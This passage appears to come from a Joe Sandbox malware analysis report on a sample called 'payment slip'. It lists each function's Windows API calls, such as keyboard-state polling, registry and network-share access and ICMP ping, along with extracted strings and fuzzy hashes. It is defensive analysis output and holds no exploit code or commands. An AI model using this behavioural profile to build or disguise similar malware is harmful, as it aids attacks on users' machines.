                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0007F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00099717
                                        • LoadStringW.USER32(00000000,?,0007F7F8,00000001), ref: 00099720
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0007F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00099742
                                        • LoadStringW.USER32(00000000,?,0007F7F8,00000001), ref: 00099745
                                        • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00099866
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message_wcslen
                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                        • API String ID: 747408836-2268648507
                                        • Opcode ID: f7ea6ccfd9fbb08d74f412cb2d68db620b13a2ed3e40169986d2cb679304e3e9
                                        • Instruction ID: f0e0551166dfc316f4fbbe0cf1552beda5dc86a4a4b49c5a205eccc7b80bf91a
                                        • Opcode Fuzzy Hash: f7ea6ccfd9fbb08d74f412cb2d68db620b13a2ed3e40169986d2cb679304e3e9
                                        • Instruction Fuzzy Hash: 57413972804209AADF05EBE4CE86EEEB37CAF55340F504069F60572092EF756F48DA61
                                        Function 000906DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000907A2
                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000907BE
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000907DA
                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00090804
                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0009082C
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00090837
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0009083C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                        • API String ID: 323675364-22481851
                                        • Opcode ID: d59369ba7b689af7280d5aa1efd0b19c2b4933149e9d26bdbc5083d6c099f05f
                                        • Instruction ID: fefda0516a3d790ae055f1fec539230b556ba0cc1e4c753441ef00a0b108e05a
                                        • Opcode Fuzzy Hash: d59369ba7b689af7280d5aa1efd0b19c2b4933149e9d26bdbc5083d6c099f05f
                                        • Instruction Fuzzy Hash: 1B413672D10229AFDF16EBA4DC85CEEB7B8BF04350F144129E945B3161EB709E04CBA0
                                        Function 000C3C46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateMenu.USER32 ref: 000C3C79
                                        • SetMenu.USER32(?,00000000), ref: 000C3C88
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C3D10
                                        • IsMenu.USER32(?), ref: 000C3D24
                                        • CreatePopupMenu.USER32 ref: 000C3D2E
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 000C3D5B
                                        • DrawMenuBar.USER32 ref: 000C3D63
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                        • String ID: U$0$F
                                        • API String ID: 161812096-3933276334
                                        • Opcode ID: 7c16858d872c7a1796a152efe6c83800b2de34f6659821d0a63042fc3c28b3fe
                                        • Instruction ID: bb9637095a2f00cd8b3ad79d04ec6e909cc9e82f39a1efc198c18bd2fab4abe8
                                        • Opcode Fuzzy Hash: 7c16858d872c7a1796a152efe6c83800b2de34f6659821d0a63042fc3c28b3fe
                                        • Instruction Fuzzy Hash: 0E415675A11609AFEB14CF64E884FAE7BB5FF4A350F14402CF94AA7360D774AA50CB90
                                        Function 000B3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 000B3C5C
                                        • CoInitialize.OLE32(00000000), ref: 000B3C8A
                                        • CoUninitialize.OLE32 ref: 000B3C94
                                        • _wcslen.LIBCMT ref: 000B3D2D
                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 000B3DB1
                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 000B3ED5
                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 000B3F0E
                                        • CoGetObject.OLE32(?,00000000,000CFB98,?), ref: 000B3F2D
                                        • SetErrorMode.KERNEL32(00000000), ref: 000B3F40
                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000B3FC4
                                        • VariantClear.OLEAUT32(?), ref: 000B3FD8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                        • String ID:
                                        • API String ID: 429561992-0
                                        • Opcode ID: eb90cdac54766751c097a17c157e52fdb2443f778512c6cb348b8460d0dadfb8
                                        • Instruction ID: f49c25d68d58c97af2e73e69429cbfea94af3a4d45cfdb38bba1e43e42981fd1
                                        • Opcode Fuzzy Hash: eb90cdac54766751c097a17c157e52fdb2443f778512c6cb348b8460d0dadfb8
                                        • Instruction Fuzzy Hash: 96C144716082059FD700DF68C884DABBBE9FF89744F24492DF98A9B251DB31EE05CB52
                                        Function 000A7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 000A7AF3
                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 000A7B8F
                                        • SHGetDesktopFolder.SHELL32(?), ref: 000A7BA3
                                        • CoCreateInstance.OLE32(000CFD08,00000000,00000001,000F6E6C,?), ref: 000A7BEF
                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 000A7C74
                                        • CoTaskMemFree.OLE32(?,?), ref: 000A7CCC
                                        • SHBrowseForFolderW.SHELL32(?), ref: 000A7D57
                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 000A7D7A
                                        • CoTaskMemFree.OLE32(00000000), ref: 000A7D81
                                        • CoTaskMemFree.OLE32(00000000), ref: 000A7DD6
                                        • CoUninitialize.OLE32 ref: 000A7DDC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                        • String ID:
                                        • API String ID: 2762341140-0
                                        • Opcode ID: ef6d5208303d7d8c1f336484eea158c3c03c39ce5c0ce452e6719249d56de9b5
                                        • Instruction ID: 73cb12350039057650bf679d3b36b15a0ce8277bca33355043ee7866d4c11481
                                        • Opcode Fuzzy Hash: ef6d5208303d7d8c1f336484eea158c3c03c39ce5c0ce452e6719249d56de9b5
                                        • Instruction Fuzzy Hash: 81C13B75A04109AFDB14DFA4C884DAEBBF9FF49314F148498F81A9B262DB31ED45CB90
                                        Function 0008FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0008FAAF
                                        • SafeArrayAllocData.OLEAUT32(?), ref: 0008FB08
                                        • VariantInit.OLEAUT32(?), ref: 0008FB1A
                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 0008FB3A
                                        • VariantCopy.OLEAUT32(?,?), ref: 0008FB8D
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 0008FBA1
                                        • VariantClear.OLEAUT32(?), ref: 0008FBB6
                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 0008FBC3
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0008FBCC
                                        • VariantClear.OLEAUT32(?), ref: 0008FBDE
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0008FBE9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                        • String ID:
                                        • API String ID: 2706829360-0
                                        • Opcode ID: 1b52f1615432dba465ea42c7bdcc95dfc96772479f8e16173509e7da9638bb73
                                        • Instruction ID: a97e2194223989f645a9aca7e3259a2aca0b4c129962010ce1b50839bd08a709
                                        • Opcode Fuzzy Hash: 1b52f1615432dba465ea42c7bdcc95dfc96772479f8e16173509e7da9638bb73
                                        • Instruction Fuzzy Hash: A3414075A0021A9FEB04EF64C854DFEBBB9FF48354F008069E94AA7261DB74A945CF90
                                        Function 00099C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 00099CA1
                                        • GetAsyncKeyState.USER32(000000A0), ref: 00099D22
                                        • GetKeyState.USER32(000000A0), ref: 00099D3D
                                        • GetAsyncKeyState.USER32(000000A1), ref: 00099D57
                                        • GetKeyState.USER32(000000A1), ref: 00099D6C
                                        • GetAsyncKeyState.USER32(00000011), ref: 00099D84
                                        • GetKeyState.USER32(00000011), ref: 00099D96
                                        • GetAsyncKeyState.USER32(00000012), ref: 00099DAE
                                        • GetKeyState.USER32(00000012), ref: 00099DC0
                                        • GetAsyncKeyState.USER32(0000005B), ref: 00099DD8
                                        • GetKeyState.USER32(0000005B), ref: 00099DEA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: f149451a9e4a68ea03f1a538d7f5f1475838c0241219f06aa78dac18e236bcbb
                                        • Instruction ID: 8395430a7d9abd82758272c9ee139d26679bb37e314f5df6033502a2c8c37088
                                        • Opcode Fuzzy Hash: f149451a9e4a68ea03f1a538d7f5f1475838c0241219f06aa78dac18e236bcbb
                                        • Instruction Fuzzy Hash: 60412A70505BC96DFFB087A8C8447B5BEE06F12344F08805EDAC6565C2EBE59DC8D7A2
                                        Function 000B055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WSAStartup.WSOCK32(00000101,?), ref: 000B05BC
                                        • inet_addr.WSOCK32(?), ref: 000B061C
                                        • gethostbyname.WSOCK32(?), ref: 000B0628
                                        • IcmpCreateFile.IPHLPAPI ref: 000B0636
                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 000B06C6
                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 000B06E5
                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 000B07B9
                                        • WSACleanup.WSOCK32 ref: 000B07BF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                        • String ID: Ping
                                        • API String ID: 1028309954-2246546115
                                        • Opcode ID: 730eb790df2df87b842af56706b7dab3d880ea830eaac3eb0c3e75037532ac91
                                        • Instruction ID: 7ce1caf11426689a9e9e45dfbddc4ec291889288772abec49b16a563077bf483
                                        • Opcode Fuzzy Hash: 730eb790df2df87b842af56706b7dab3d880ea830eaac3eb0c3e75037532ac91
                                        • Instruction Fuzzy Hash: F5918E75A086019FD320CF15C888F5BBBE4EF84318F1485A9F4698B6A2CB34ED45CF91
                                        Function 000B8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharLower
                                        • String ID: cdecl$none$stdcall$winapi
                                        • API String ID: 707087890-567219261
                                        • Opcode ID: a9ed6dc3086c4a97938f4513d96c98ec5ae6795f06965579ade3c838a506fef8
                                        • Instruction ID: 0d4d7337f921ac23cd4219ae1e1ab9611e883a0ca561204241412b627afecf51
                                        • Opcode Fuzzy Hash: a9ed6dc3086c4a97938f4513d96c98ec5ae6795f06965579ade3c838a506fef8
                                        • Instruction Fuzzy Hash: CE51B131A041169BCF24DF68C9519FEB7E9BF64324B21822AE926E72D5DF31DD40C790
                                        Function 000B372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32 ref: 000B3774
                                        • CoUninitialize.OLE32 ref: 000B377F
                                        • CoCreateInstance.OLE32(?,00000000,00000017,000CFB78,?), ref: 000B37D9
                                        • IIDFromString.OLE32(?,?), ref: 000B384C
                                        • VariantInit.OLEAUT32(?), ref: 000B38E4
                                        • VariantClear.OLEAUT32(?), ref: 000B3936
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                        • API String ID: 636576611-1287834457
                                        • Opcode ID: 64deefd4dddc558b5d281da08cb35de169c8d702cea7ebef0149cf2b69857f35
                                        • Instruction ID: 626913a9bfbe5f21e2d1492cf5d289d7a788ed92f3803b082cfa81f78115d974
                                        • Opcode Fuzzy Hash: 64deefd4dddc558b5d281da08cb35de169c8d702cea7ebef0149cf2b69857f35
                                        • Instruction Fuzzy Hash: 446190B1608711AFD721DF54C889FAEB7E8EF49710F204819F5859B291DB70EE48CB92
                                        Function 000C8B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                          • Part of subcall function 0004912D: GetCursorPos.USER32(?), ref: 00049141
                                          • Part of subcall function 0004912D: ScreenToClient.USER32(00000000,?), ref: 0004915E
                                          • Part of subcall function 0004912D: GetAsyncKeyState.USER32(00000001), ref: 00049183
                                          • Part of subcall function 0004912D: GetAsyncKeyState.USER32(00000002), ref: 0004919D
                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 000C8B6B
                                        • ImageList_EndDrag.COMCTL32 ref: 000C8B71
                                        • ReleaseCapture.USER32 ref: 000C8B77
                                        • SetWindowTextW.USER32(?,00000000), ref: 000C8C12
                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 000C8C25
                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 000C8CFF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                        • String ID: U$@GUI_DRAGFILE$@GUI_DROPID
                                        • API String ID: 1924731296-2763321216
                                        • Opcode ID: 1b5d91e89ebba16d824fe12e1f9686d182b12cb767a37095dc2c8d1769d24cf0
                                        • Instruction ID: 5e1dfe9bfd51562a1d7af3c8c0aeb259a0ee0f54fab25b2dca99447a9619759e
                                        • Opcode Fuzzy Hash: 1b5d91e89ebba16d824fe12e1f9686d182b12cb767a37095dc2c8d1769d24cf0
                                        • Instruction Fuzzy Hash: E1514971104304AFE704DF24D996FAE77E4FB88714F400A2DF996A72E2DBB49944CB62
                                        Function 000A3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 000A33CF
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 000A33F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LoadString$_wcslen
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 4099089115-3080491070
                                        • Opcode ID: b01ab50f5b08ba184a5cca2f5884beff172fdce69bf869727634d4e31409196c
                                        • Instruction ID: f1496586ec337dbdcd529c3b64e392e7141f15e77337846516c837ee56053849
                                        • Opcode Fuzzy Hash: b01ab50f5b08ba184a5cca2f5884beff172fdce69bf869727634d4e31409196c
                                        • Instruction Fuzzy Hash: 5A517C71D00209BADF16EBE4CD46EEEB7B8AF05340F104165F605760A2EB752F98DB61
                                        Function 0009B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharUpper
                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                        • API String ID: 1256254125-769500911
                                        • Opcode ID: 316413cb8cc671821179b09e6cbb014a7acacc6bffa2c908cc45652922724596
                                        • Instruction ID: d5867ef3fc190abdd571cf2aa017a74bcb2c4e47defc9fa5d5652e14097cbf31
                                        • Opcode Fuzzy Hash: 316413cb8cc671821179b09e6cbb014a7acacc6bffa2c908cc45652922724596
                                        • Instruction Fuzzy Hash: 4A412B32A041269BCF206F7DDE905BEB7E5AFA0774B244229E421D7280E739DC81E390
                                        Function 000A5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 000A53A0
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 000A5416
                                        • GetLastError.KERNEL32 ref: 000A5420
                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 000A54A7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Error$Mode$DiskFreeLastSpace
                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                        • API String ID: 4194297153-14809454
                                        • Opcode ID: 17620e79c3a0260d245b625641d8cf7548bc84e0e6dc5e9fa93c6b96e812faff
                                        • Instruction ID: 66819cbebef694e858e2ca37cd2b9ae7902e006be29334b736b8615c65e991d8
                                        • Opcode Fuzzy Hash: 17620e79c3a0260d245b625641d8cf7548bc84e0e6dc5e9fa93c6b96e812faff
                                        • Instruction Fuzzy Hash: A631BF35A006089FD710DFA8C884EEEBBF4FB0A30AF188065E505CB692D775DD82CB90
                                        Function 0009B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 0009B151
